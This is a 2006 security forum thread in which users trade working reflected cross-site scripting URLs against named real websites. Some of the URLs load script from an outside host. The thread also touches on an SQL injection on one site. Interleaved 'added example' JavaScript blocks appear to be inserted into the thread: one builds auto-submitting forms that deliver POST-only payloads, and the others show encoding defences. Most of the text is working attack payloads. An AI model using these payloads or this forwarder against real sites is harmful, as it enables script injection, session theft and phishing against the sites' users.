Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:24AM

he's right that it does digital.. the same for jeep.com

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.f5.com/f5/contact.php&name=XSS+here%3Cscript+src=http://ha.ckers.org/s.js%3E%3C/script%3E&areacode=&phone=&phoneExt=&region=&howtocontact=phone&action=Submit (f5.com - previously disclosed) is an example of one that's POST only, ghozt

-maluc

Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:32AM

please note: these have all already been disclosed .. but can be linked via GET as well as POST, so i'm reposting without going through whiteacid's script.

http://www.gm.com/Scripts/SearchServer.exe?query=%22%3E%3Cscript%3Ealert('!');%3C/script%3E&method=mainQuery&Submit=Submit disclosed by digi7al64
http://www.anywho.com/qry/wp_fap?lastname=%22%3E%3Cscript%20src=http://ha.ckers.org/s.js%3E%3C/script%3E&Submit=Submit disclosed by digi7al64
http://www.verisign.com/cgi-bin/ssl/email-friend/email.cgi?chromeTitle=End%20of%20the%20Internet&check=yes&url=http://www.shibumi.org/eoti.htm&to_email=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3C%2F%73%63%72%69%70%74%3E disclosed by Kyran
http://news.com.com/2113-1038_3-6119515.html?toEmailAddress=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E disclosed by Kyran
https://business.verizonwireless.com/b2b/jsp/popups/optin.jsp?email=xss'%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cb%20 disclosed by me ^^
http://www.travelodge.com/Travelodge/control/find_by_map_name2?LOCATION_LEVEL=country&LOCATION_CODE=null disclosed by digi7al64
http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field disclosed by WhiteAcid
http://userfriendly.org/cgi-bin/survey.cgi?personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E disclosed by WhiteAcid

There were 9.5 other ones that genuinely require it to be POST .. 9 are still active, that .5 is fixed either way, so can't tell.

-maluc

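The two posts above draw the line between XSS that can be "linked via GET" and XSS that lives in a POST-only form, for which the thread routes links through WhiteAcid's xss_post_forwarder.php. The following is an added example, not WhiteAcid's script or any code from the thread: it re-creates the idea in JavaScript, turning a forwarder-style URL (an `xss_target` parameter followed by the form fields, as in the quoted links) into a self-submitting HTML form. Function names and the `xss_target` parsing convention are assumptions; the sample URL in the usage note is the f5.com link quoted above.

```javascript
// Added example (not WhiteAcid's xss_post_forwarder.php): a POST-only
// reflected XSS is still deliverable from a single link, because a page the
// attacker controls can auto-submit a form to the target. The parameter
// convention (xss_target + form fields) mirrors the URLs quoted in the thread;
// it is an assumption, not a description of the real script.

// Attribute-encode so the payload rides along as POST data without becoming
// live markup on the forwarder page itself.
function htmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Splits a forwarder URL into the POST target and the form fields.
// Note: URLSearchParams splits on '&', so a target that already carries a
// query string (like the Whale.asp link later in the thread) loses everything
// after its first '&' to the field list. That is the same gotcha the thread
// hits with POST-only links and is why full, encoded links are requested.
function parseForwarderUrl(url) {
  const u = new URL(url);
  const target = u.searchParams.get('xss_target');
  const fields = {};
  for (const [k, v] of u.searchParams) {
    if (k !== 'xss_target') fields[k] = v;
  }
  return { target, fields };
}

// Builds the page that does the POST: hidden inputs plus a submit() on load.
function buildPostForwarder(target, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${htmlAttr(name)}" value="${htmlAttr(value)}">`)
    .join('\n');
  return [
    '<!doctype html>',
    `<form id="f" method="POST" action="${htmlAttr(target)}">`,
    inputs,
    '</form>',
    "<script>document.getElementById('f').submit();</script>",
  ].join('\n');
}

// Convenience: one call from forwarder URL to HTML.
function forwarderPageFor(url) {
  const { target, fields } = parseForwarderUrl(url);
  return buildPostForwarder(target, fields);
}
```

Run `forwarderPageFor(...)` on the f5.com link quoted above and the returned page carries the `name` field as `XSS here&lt;script src=...&gt;` in a hidden input: the browser decodes that back to the raw `<script>` when it serialises the form, so the target sees the original payload while the forwarder page itself stays free of injected markup.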
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:36AM

http://www.us-webmasters.com/Decode-URLs/
http://www.netdemon.net/decode.html
%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

By the way, I'm pretty new to XSS, so this is probably the best place to ask. If I can bypass the < and > filters on a site with &lt; and &gt; and have it show as <script> and </script> then is there any way to make it execute the script instead of just displaying it?

Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:51AM

Please try to post the full link when disclosing .. it's not a requirement (there are no requirements/rules to disclosing here) but it makes it easier for my lazy self. whiteacid's script for POSTs is very handy

And no, if it shows up as &lt; in the source.. it's not going to render in the browser. However, rarely - and i stress rarely - you may find a site that converts the &lt; back into a < and displays it .. i can only recall it once before, and i didn't pay attention to what language it was written in. :/

But almost always, no.

-maluc

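The exchange above (Ghozt's question about submitting `&lt;script&gt;` past a `<`/`>` filter, and maluc's answer that entity-encoded output is displayed rather than parsed unless the site decodes it back) is easy to see in code. The following is an added example, not code from the thread: a renderer that encodes once at output time beside one that does the rare "convert &lt; back into <" behaviour maluc mentions. The templates, helper names and sample inputs are assumptions constructed for illustration.

```javascript
// Added example, not from the thread. Shows why &lt;script&gt; is inert in
// a correctly encoded page and what kind of server-side mistake revives it.

const ENTITY_MAP = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };

// Output encoding for an HTML text node: the only step a safe renderer needs.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Decodes named and numeric character references, i.e. a crude model of a
// server-side "unescape" helper that should never run on untrusted input
// right before it is written into a page.
function decodeEntities(s) {
  return String(s).replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, ref) => {
    if (ref[0] === '#') {
      const code = ref[1].toLowerCase() === 'x'
        ? parseInt(ref.slice(2), 16)
        : parseInt(ref.slice(1), 10);
      return String.fromCodePoint(code);
    }
    const named = ENTITY_MAP[ref.toLowerCase()];
    return named === undefined ? m : named;
  });
}

// Correct: encode exactly once, at the point the value enters the HTML.
function renderSafe(userInput) {
  return `<p>You searched for: ${escapeHtml(userInput)}</p>`;
}

// The misbehaviour maluc describes: the application decodes what the user
// sent before writing it out, so submitting &lt;script&gt; yields <script>.
function renderDoubleDecoded(userInput) {
  return `<p>You searched for: ${decodeEntities(userInput)}</p>`;
}

// A <script> that only exists as &lt;script&gt; is text, not a tag.
function hasRawScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```

With the safe renderer, both a raw `<script>` and an entity-encoded `&lt;script&gt;` come out as text (`&lt;script&gt;` and `&amp;lt;script&amp;gt;` respectively), which is why the answer to Ghozt's question is "almost always, no". Only the double-decoding renderer turns the encoded submission into a parsed tag, and that is the case to test for when a site echoes entity-looking input: submit `&#60;` or `&#x3C;` as well as `&lt;`, since the decoder may handle the numeric forms differently.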
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:56AM

http://profiles.yahoo.com/ghozt64
I was pretty sure it wouldn't, but I thought it was a good idea to ask.

Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:10AM

http://webcenters.netscape.compuserve.com/celebrity/results.jsp?floc=ce-main-2-l1&q=a--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&searchType=photosearch&x=0&y=0

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:18AM

http://search.lexmark.com/searchresults.shtml?query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=44&y=16
http://www.nvidia.com/page/search.html?page=1&keywords=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&booleanMode=1
http://search.ati.com/nasearch.asp?Query=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&go.x=14&go.y=15&DefaultLanguage=16&Catalog=NASite&rdoCatalog=NASite&Start=&Total=&Stat=New
http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&qxt=home&display=&dclksa=1

Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:28AM

ask away, it's exactly what this forum is for..

http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= <a> tag breakout
http://www.hooters.com/news_and_events/calendar/index.asp?req_event=&req_state=asdf--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&submit=Search&c_date=&req_yr= <!-- --> tag breakout

it's also very clearly susceptible to SQL injection (and kind enough to list its query string) .. which would probably allow you to add Hooter events to the database with html tags .. thus persistent.

-maluc

Re: So it begins
Posted by: maluc
Date: September 28, 2006 02:32AM

the buy.com doesn't appear to work, although if you look in the source there are two places for injection inside javascript. They're the same kinda injection so one input will execute both..

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:35AM

Buy.com works in firefox. Not sure how to put geeksquad in a URL, so "><script>alert('XSS')</script> goes in Mailing list. http://www.geeksquad.com/email/HighLevel.php

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 02:38AM

http://www.pricegrabber.com/search_attrib.php?form_keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&topcat_id=&page_id=5&lo_p=0&hi_p=0
http://www.xfxforce.com/web/search.jspa?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchIn=gamersCentral&searchIn=support&searchIn=product&searchIn=news&searchIn=feature
http://www.bizrate.com/search__SEARCH_GO--Find%20it!__cat_id--1__keyword--%22%3Balert('xss')%3Bvar%20str%3D%22__search_box--1__sfsk--0.html
http://castle.pricewatch.com/s/search.asp?s=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
http://www.cyberguys.com/templates/searchall.asp?search=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 02:54AM

http://www.gotdotnet.com/GDNSearch.aspx?query=<script>alert('xss')</script>&Sites=(www.GotDotNet.com)

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:06AM

http://www.sonystyle.com/is-bin/INTERSHOP.enfinity/eTS/Store/en/-/USD/SY_Email_Subscription-Create?source=LC&mailpref=Y&email=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%40yahoo.com
http://www.alliedelec.com/Search/SearchResults.asp?N=0&page=no_results&Ntt=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E&sid=451B10801174E17F&i=
http://www.mouser.com/search/Refine.aspx?Ne=1447464+254016&Ntt=*%3e%3cscript%3ealertXSS%3cscript%3e*&Ntx=mode%2bmatchall&Mkw=%22%3e%3cscript%3ealert('XSS')%3c%2fscript%3e&N=1323038&Ntk=Mouser_Wildcards
http://www.newark.com/NewarkWebCommerce/newark/en_US/endecaSearch/searchPage2.jsp;jsessionid=2KVVR5G302HOOCXDUY2SFFYK2OTCIIV1?Ntt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchtype=mfg&Nty=1&N=0&Ntk=gensearch
http://www.jameco.com/webapp/wcs/stores/servlet/CatalogSearchResultView?langId=-1&storeId=10001&catalogId=10001&searchValue=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&searchType=m

Re: So it begins
Posted by: maluc
Date: September 28, 2006 03:17AM

Well i'm off to sleep now.. but the buy.com doesn't seem to work in firefox/opera/ie7 as it is - what version of ff are you running?

i do however get it to execute after first breaking out of the <!-- --> like in:
--><script>alert(1)</script>

cleaned up: http://www.buy.com/retail/searchresults.asp?querytype=home&qu=%2D%2D%3E%3Cscript%3Ealert%28String%2EfromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3Cscript%3E%3C%21%2D%2D&qxt=home&display=&dclksa=1

-maluc

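Three reflection contexts recur in the payloads posted in this stretch of the thread: the `"><script>` style that closes an attribute of an `<a>` tag (maluc's first hooters link), the `-->` style that closes an HTML comment (the second hooters link and maluc's buy.com fix above, which also uses `String.fromCharCode(88,83,83)` to avoid quote characters), and the `";alert('xss');var str="` style Ghozt uses on lexmark, nvidia and ati, which closes a JavaScript string literal. The following is an added example, not code from the thread or from any of the sites named in it: it reproduces each context in a tiny template, shows the matching hardened output, and checks mechanically whether the payload escaped its context. The templates, encoder and checker names are assumptions; the payloads in the usage note are the thread's own, URL-decoded.

```javascript
// Added example, not from the thread. Same payload, three contexts, and the
// context-specific encoding that defeats each one.

// Attribute context: encode quotes and angle brackets so the value cannot
// close the attribute or the tag.
function encodeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// JS string context: JSON.stringify supplies the quotes and escapes " and \,
// but leaves "</script>" intact, so < and > (and the two line terminators
// JSON permits) are escaped as well to keep the literal from ending the block.
function encodeJsString(s) {
  return JSON.stringify(String(s))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Reflects `input` in one of the three contexts, raw or hardened.
function render(context, input, hardened) {
  switch (context) {
    case 'attr':
      return `<a href="/calendar?req_state=${hardened ? encodeAttr(input) : input}">Search</a>`;
    case 'comment':
      // There is no safe encoder for comment content (--> always ends it);
      // the hardened page simply does not echo untrusted input there.
      return hardened
        ? '<!-- search term omitted -->'
        : `<!-- search term: ${input} -->`;
    case 'js':
      return `<script>var str = ${hardened ? encodeJsString(input) : '"' + input + '"'};</script>`;
    default:
      throw new Error('unknown context ' + context);
  }
}

// Checker for the attr and comment contexts: does a <script> start tag
// appear anywhere outside a <!-- --> comment?
function hasLiveScriptTag(html) {
  let inComment = false;
  for (let i = 0; i < html.length; i++) {
    if (!inComment && html.startsWith('<!--', i)) { inComment = true; i += 3; continue; }
    if (inComment && html.startsWith('-->', i)) { inComment = false; i += 2; continue; }
    if (!inComment && /^<script[\s>]/i.test(html.slice(i, i + 8))) return true;
  }
  return false;
}

// Checker for the js context: run the inline script with a stub alert() and
// report whether the payload managed to call it. A syntax error means the
// payload broke the script without getting to run.
function inlineScriptFires(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  if (!m) return false;
  let fired = false;
  try {
    new Function('alert', m[1])(() => { fired = true; });
  } catch (e) {
    // broken script: nothing executed
  }
  return fired;
}
```

Feeding `asdf"><script>alert("XSS")</script><x x="` to the `attr` template, `asdf--><script>alert("XSS")</script><x x="` to the `comment` template and `";alert('xss');var str="` to the `js` template, the raw renderings all escape their context and the hardened ones do not. The trailing `<x x="` in the thread's payloads is there to swallow the rest of the original attribute or comment so the page stays syntactically tidy; maluc's buy.com version does the same for a comment with a trailing `<script><!--`.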
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:19AM

I'm running 1.5.0.7 linux.
G'nite.

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:21AM

http://cars.kbb.com/go/search/advanced_search.jsp?error=ERR_INV_ZC&tracktype=usedcc&searchType=22&yearType=popular&cid=&dlid=&dgid=&amid=&cname=&zc=%26amp%3Bamp%3B&makeid=1&modelid=&pageNumber=0&numResultsPerPage=50&largeNumResultsPerPage=0&sortorder=descending&sortfield=PRICE+descending&certifiedOnly=false&criteria=&aff=carskbb&aff=carskbb

Re: So it begins
Posted by: maluc
Date: September 28, 2006 03:21AM

heh, you're on a roll~ .. and i'm sad to see so many hardware component vendors, although i'm not surprised.

-maluc

Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:29AM

http://www.engadget.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E :D
http://www.lww.com/search/advancedsearch/?rowStart=1&title=&author=&ISBN=&keyword=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&exactTerm=1&allFields=1&yearFrom=&yearThru=&productTypes=&mediaTypes=&source=qs&action=search
http://search.gifts.com/?q=%22%3Balert%28%27xss%27%29%3Bvar+str%3D%22&x=26&y=6
http://www.linuxdevices.com/cgi-bin/search_view.cgi?snews=checked&sarticle=checked&sk=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&st=all&view=Search&ss=newest
http://www.gamerankings.com/itemrankings/Itemsearch.asp?Itemname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&extsearch=0
Something funny I found: http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intext%3Asearch+site%3Adigg.com+intitle%3Asearch+inurl%3Asearch&btnG=Search Look at the second listing.
http://www.cbsnews.com/stories/2005/09/26/search/main886284.shtml?source=cbsnews&searchString=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sort=1&type=all&num=10&offset=0&x=54&y=9
http://www.travelport.com/en/search/index.cfm?qt=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

Re: So it begins
Posted by: maluc
Date: September 28, 2006 10:10AM

Well i'm glad to see Acunetix is addressing the issue now.. and hopefully doesn't deny it later as a 'planned' software upgrade.

-maluc

Re: So it begins
Posted by: kirke
Date: September 28, 2006 11:27AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.whalecommunications.com/site/whale/corporate/Whale.asp?pi=24&topSearchText=whale%22%3E%3Cscript%3Ealert('XSS+with+Secure+Remote+Access+from+Anywhere')%3C/script%3E

POST only, but nice example where to dig deeper.

Re: So it begins
Posted by: maluc
Date: September 28, 2006 11:50AM

hrm, i get an SQL error when trying.. it works when changing the single quotes to double quotes though
(except after getting the error in firefox, i can't change the request in firefox to anything else, persistent error page)

-maluc

Re: So it begins
Posted by: kirke
Date: September 28, 2006 12:18PM

works perfect for me in FF, the SQL error is a/the goody;-)

Re: So it begins
Posted by: kirke
Date: September 28, 2006 12:44PM

someone willing to setup a list with: url, date of disclosure, days 'til fix ?
That would give the blamed sites a chance for getting back their reputation, somehow , or being on top of the wall of shame when sorted with last column.

Re: So it begins
Posted by: Kyran
Date: September 28, 2006 12:50PM

If we are to do that, we need a formal disclosure form we can agree on. And someone to keep track of it all.

- Kyran

Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 12:55PM

How about we take this to another thread? This one is long enough. I'll start one in projects.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: Kyran
Date: September 28, 2006 01:00PM

Yeah. For discussion of disclosure, etc.

- Kyran

Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:12PM

maybe if i get bored one afternoon, i'll slap together a script for it .. and put it up on this box - but i don't have a reliable host to put it on that supports databases. So if it ever gets slashdotted or becomes popular.. expect a nice long DDoS ^^

in other news: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://portal.knowledgebase.net/display/4n/login.asp&aid=&t=&searchstring=&search=&cat=&catURL=&cpid=10213&username=XSS%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx%20x=%22&password=&rememberme=on <-- NetContinuum's support login, on knowledgebase.net

i'm not sure if this is indicative of a problem on all knowledgebases or just theirs.. anyone care to investigate?

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 01:17PM

A highly amusing image considering what this company says about the flaws we found on its site:


I'm writing a post on http://blogs.securiteam.com just to explain the issue in more detail to people in other circles.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:38PM

I'm not one for company bashing, but they did irk me when they denied it. Especially when it's their field of work, and their flagship product is a gangly tool that's supposed to scan for such things.. but oh well, they're putting their own foot in their mouth with the PR girl they have. (8 uses of forms of the word 'they')

On the bright side, they fixed the issues much faster than most companies.

-maluc

Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 01:42PM

http://blogs.securiteam.com/index.php/archives/649 < a rant I made about the whole Acunetix issue.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer
